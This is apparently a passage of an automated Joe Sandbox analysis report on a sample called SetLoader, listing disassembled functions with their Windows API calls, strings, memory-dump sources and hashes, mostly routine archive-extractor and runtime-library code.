                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ObjectRelease$CapsDevice
                                              • String ID: ($fc
                                              • API String ID: 1061551593-2060305483
                                              • Opcode ID: e51be99fa5c74fc843245fcd0d5e81834e5cd6e1b65c3915edad0f83e6c5e6a8
                                              • Instruction ID: e576193f0aef9495d04f1aaa78c5104265d37c69711daaa09bc4fecfbf4710c8
                                              • Opcode Fuzzy Hash: e51be99fa5c74fc843245fcd0d5e81834e5cd6e1b65c3915edad0f83e6c5e6a8
                                              • Instruction Fuzzy Hash: 6391F275608754AFD710DF29D844A2BBBEAFF89B11F00491EF48AD3260CB70A945CF62
                                              Function 0062D76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: }
                                              • API String ID: 176396367-4239843852
                                              • Opcode ID: 056dfbc78f91dc6ba3cb2e557e05c60e926425bc93a20bb036d523ce38d055f4
                                              • Instruction ID: 7a6c9210d1a0bca109e911c762be80d6748351bb763333fdda571c41a1ba77c4
                                              • Opcode Fuzzy Hash: 056dfbc78f91dc6ba3cb2e557e05c60e926425bc93a20bb036d523ce38d055f4
                                              • Instruction Fuzzy Hash: 78210372904B655AD731EF24E845AABB3EFEF85710F40042EF540C3281EB74D8488BE6
                                              Function 0062CDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0062CE3D
                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0062CE52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemText$Window
                                              • String ID: ASKNEXTVOL
                                              • API String ID: 2802354418-3402441367
                                              • Opcode ID: 393aea4d06d2d1d87818107a74ea2973a6f6ec4a3dea50d3433d30bc88505a82
                                              • Instruction ID: 7c849c502872ecc726132a25d87145c0b0cd15a8d7ce99e8874933e6ac084a71
                                              • Opcode Fuzzy Hash: 393aea4d06d2d1d87818107a74ea2973a6f6ec4a3dea50d3433d30bc88505a82
                                              • Instruction Fuzzy Hash: E4112C33640A21AFE3119F58EC05FAE3B6BFF4AB50F050054F645AB1A4C7615941DFA5
                                              Function 006301B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(00010418), ref: 00630210
                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010418,0062D510,?,?), ref: 00630247
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DialogParamVisibleWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 3157717868-3292211884
                                              • Opcode ID: d5c9d5f11429e8cd6fab1c5d2977d3700a908fb834a66d898d30c353300f4180
                                              • Instruction ID: 9d56518316de20da0b9a1fbb4eb67cd2e64ae9071a7a8f8eee1fd3de6b63c054
                                              • Opcode Fuzzy Hash: d5c9d5f11429e8cd6fab1c5d2977d3700a908fb834a66d898d30c353300f4180
                                              • Instruction Fuzzy Hash: 8011B7712483806FD360DB64DC66EEBB7DBAB89701F05442DF189D3191CAA46988CBA6
                                              Function 0062136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 006212F6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00621315
                                                • Part of subcall function 006212F6: GetProcAddress.KERNEL32(0065C1F0,CryptUnprotectMemory), ref: 00621325
                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00621366), ref: 006213F9
                                              Strings
                                              • CryptProtectMemory failed, xrefs: 006213B0
                                              • CryptUnprotectMemory failed, xrefs: 006213F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc$CurrentProcess
                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                              • API String ID: 2190909847-396321323
                                              • Opcode ID: f202f03d8425fc09cd77151403173eefa420128c836777cef31c83f8928baabc
                                              • Instruction ID: 1fec1a8271ed00f0d7c13cc857cfcce71aa2095d5d9efa27121a233ecc9a5c91
                                              • Opcode Fuzzy Hash: f202f03d8425fc09cd77151403173eefa420128c836777cef31c83f8928baabc
                                              • Instruction Fuzzy Hash: A2110A31608B35AFDB25AF20EC009AE3B679F23725B044125FC156F252D7305D818ED5
                                              Function 0061D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              APIs
                                              • _swprintf.LIBCMT ref: 0061D8D3
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: __vswprintf_c_l_swprintf
                                              • String ID: %c:\
                                              • API String ID: 1543624204-3142399695
                                              • Opcode ID: f31f64401be53209c98b0d745a5b9f859f985ef3f11b829386c105c571c0e005
                                              • Instruction ID: 0071820f1600531d4daec7c2e43903e4113f05e6ed4e6a151c7924c61916faea
                                              • Opcode Fuzzy Hash: f31f64401be53209c98b0d745a5b9f859f985ef3f11b829386c105c571c0e005
                                              • Instruction Fuzzy Hash: 7301286750431179D730AB79DC46DEBA7EEDE95370B58881EF449C7282EA30E890C2E5
                                              Function 006310F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0063130A
                                              • ___raise_securityfailure.LIBCMT ref: 006313F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: 8]g
                                              • API String ID: 3761405300-167426776
                                              • Opcode ID: e1023b5b60a45e99fc4b13d729c72a90c0734fcb41b86c4fc05e84c71e0a0236
                                              • Instruction ID: e7098e4d9936bb7e747b323a596d229c5cca95d0e1ab86aec06a75f376a8b53d
                                              • Opcode Fuzzy Hash: e1023b5b60a45e99fc4b13d729c72a90c0734fcb41b86c4fc05e84c71e0a0236
                                              • Instruction Fuzzy Hash: C421C2B5510B01DBE728DF25E8996447BA7FB49314F5060AAE90ECB3B0E3F15AC08F49
                                              Function 0062D9DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadBitmapW.USER32(00000065), ref: 0062D9ED
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0062DA12
                                                • Part of subcall function 0062C652: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0062DA3D,00000066), ref: 0062C665
                                                • Part of subcall function 0062C652: SizeofResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C67C
                                                • Part of subcall function 0062C652: LoadResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C693
                                                • Part of subcall function 0062C652: LockResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C6A2
                                                • Part of subcall function 0062C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6BD
                                                • Part of subcall function 0062C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6CE
                                                • Part of subcall function 0062C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0062C737
                                                • Part of subcall function 0062C652: GlobalUnlock.KERNEL32(00000000), ref: 0062C756
                                                • Part of subcall function 0062C652: GlobalFree.KERNEL32(00000000), ref: 0062C75D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: GlobalResource$BitmapLoadLock$AllocCreateFindFreeFromGdipObjectSizeofUnlock
                                              • String ID: ]
                                              • API String ID: 1245295032-3352871620
                                              • Opcode ID: dd548e5173600162a43cfaa4edeedd5573b0e05acc81ac3907f7bf78e0412a0c
                                              • Instruction ID: 3747f1a6747aa382a0fe740733bf5b82029675f7f074458f3c85b21268b93b42
                                              • Opcode Fuzzy Hash: dd548e5173600162a43cfaa4edeedd5573b0e05acc81ac3907f7bf78e0412a0c
                                              • Instruction Fuzzy Hash: C301D672504B21A7CB116764AC09EBF3A7B9F81762F140124B808B7391DF31CD558EB4
                                              Function 00623105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00010000,00623240,?,00000000,?), ref: 00623129
                                              • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00623170
                                                • Part of subcall function 00617BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00617BD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                              • String ID: CreateThread failed
                                              • API String ID: 2655393344-3849766595
                                              • Opcode ID: d226f8becb9f7509b24f2ace9687c01e3086ca4b853c1e2f9419555bab1dff1d
                                              • Instruction ID: b94901f892f3a896cd3195dcb3bf34a1d0a980a0c85adec62275a5329d229fd4
                                              • Opcode Fuzzy Hash: d226f8becb9f7509b24f2ace9687c01e3086ca4b853c1e2f9419555bab1dff1d
                                              • Instruction Fuzzy Hash: AF01F975348B266FD3247F50EC45FA677ABEB42712F10012DFA835A2C0CBA0A9858B74
                                              Function 0063E19E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0063B9A5: GetLastError.KERNEL32(?,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063B9A9
                                                • Part of subcall function 0063B9A5: _free.LIBCMT ref: 0063B9DC
                                                • Part of subcall function 0063B9A5: SetLastError.KERNEL32(00000000,?), ref: 0063BA1D
                                                • Part of subcall function 0063B9A5: _abort.LIBCMT ref: 0063BA23
                                              • _abort.LIBCMT ref: 0063E1D0
                                              • _free.LIBCMT ref: 0063E204
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLast_abort_free
                                              • String ID: p,e
                                              • API String ID: 289325740-2941865787
                                              • Opcode ID: 0c3558f243a5588456f82c3eabd8a243396a23116ebdbe88eab77a263712c015
                                              • Instruction ID: d5abae4afd57ccff3726040de6b3e2ff8c9e6c0fc63b2e9e39630ad7101ffc05
                                              • Opcode Fuzzy Hash: 0c3558f243a5588456f82c3eabd8a243396a23116ebdbe88eab77a263712c015
                                              • Instruction Fuzzy Hash: 7F016D71D016269BCB62EF58D80229EB377BF0AB21F15021AE964673C1CB726E018FD5
                                              Function 00631405 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00631410
                                              • ___raise_securityfailure.LIBCMT ref: 006314CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: 8]g
                                              • API String ID: 3761405300-167426776
                                              • Opcode ID: fadf0882e23ffd07b96a497c20139571a959b3b7b813a4724df4a4750ed30409
                                              • Instruction ID: fd4594be2f0f19916b8101778d2c82ac75a83464d6a6f04633460ca1ea4f1691
                                              • Opcode Fuzzy Hash: fadf0882e23ffd07b96a497c20139571a959b3b7b813a4724df4a4750ed30409
                                              • Instruction Fuzzy Hash: 5111A2B5911B04DBD718DF25E8856443BB7BF09310B0060AAE90E8B3B1E3F09AC18F49
                                              Function 0063AABA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0063E580: GetEnvironmentStringsW.KERNEL32 ref: 0063E589
                                                • Part of subcall function 0063E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0063E5AC
                                                • Part of subcall function 0063E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0063E5D2
                                                • Part of subcall function 0063E580: _free.LIBCMT ref: 0063E5E5
                                                • Part of subcall function 0063E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0063E5F4
                                              • _free.LIBCMT ref: 0063AB00
                                              • _free.LIBCMT ref: 0063AB07
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                              • String ID: pbg
                                              • API String ID: 400815659-799886492
                                              • Opcode ID: 7c235a7ca4a80da4eec8c5a0d4e4c2b77240a486812f72d124986c6ed8908b1c
                                              • Instruction ID: d14637a036cb45eabfcd9644925948fde4203110afd1bcad54ab65609eee11c8
                                              • Opcode Fuzzy Hash: 7c235a7ca4a80da4eec8c5a0d4e4c2b77240a486812f72d124986c6ed8908b1c
                                              • Instruction Fuzzy Hash: F8E0E533A0590055E7E57ABEAD12EAA05578B81330F10421DFA65861C3DE90880261EB
                                              Function 006205C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(?,?,00611436,?), ref: 006205F8
                                              • LoadStringW.USER32(?,?,00611436), ref: 0062060F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: LoadString
                                              • String ID: pPe
                                              • API String ID: 2948472770-752056769
                                              • Opcode ID: 2851ebc5fe333e34616f2abc1cf76c72794abbec89522f2b473f13423f1fec0d
                                              • Instruction ID: 28af1cc6cff218c532752bca348580d2ecd1b78391855290af3b40865361acbd
                                              • Opcode Fuzzy Hash: 2851ebc5fe333e34616f2abc1cf76c72794abbec89522f2b473f13423f1fec0d
                                              • Instruction Fuzzy Hash: 8BF0F231100228BBDF115F51EC18CEBBF6BFF493A5B049025FD0986231D63288A0EBA0
                                              Function 006230CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,006232E6,?), ref: 006230D0
                                              • GetLastError.KERNEL32(?), ref: 006230DC
                                                • Part of subcall function 00617BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00617BD5
                                              Strings
                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 006230E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                              • API String ID: 1091760877-2248577382
                                              • Opcode ID: e4e788f3c25b78549fea2948714c4f95027d6f4e749f431706496cc7deb0d7b6
                                              • Instruction ID: 1cd6bbbca0c117d0b8dd9e86a8536cc1a7b0288d92d20e319a09a820b3278d15
                                              • Opcode Fuzzy Hash: e4e788f3c25b78549fea2948714c4f95027d6f4e749f431706496cc7deb0d7b6
                                              • Instruction Fuzzy Hash: B2D05E3154C53037D7513B24AC0ADAE791B9B63732F644718F53A692F5CF204D9186EA
                                              Function 006201FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,0061F951,?), ref: 006201FF
                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0061F951,?), ref: 0062020D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FindHandleModuleResource
                                              • String ID: RTL
                                              • API String ID: 3537982541-834975271
